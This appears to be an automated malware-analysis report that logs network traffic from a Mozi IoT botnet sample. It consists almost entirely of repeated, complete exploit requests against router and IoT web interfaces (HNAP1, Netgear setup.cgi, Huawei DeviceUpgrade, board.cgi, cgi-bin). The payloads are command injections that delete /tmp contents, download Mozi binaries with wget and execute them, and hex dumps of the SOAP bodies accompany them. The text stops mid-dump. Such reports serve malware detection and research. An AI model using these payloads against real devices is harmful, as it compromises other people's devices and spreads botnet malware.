                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 29.225.155.234:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 175.49.230.205:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 107.199.17.115:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 104.64.240.158:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 78.118.38.210:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 50.182.29.132:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 92.173.85.25:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 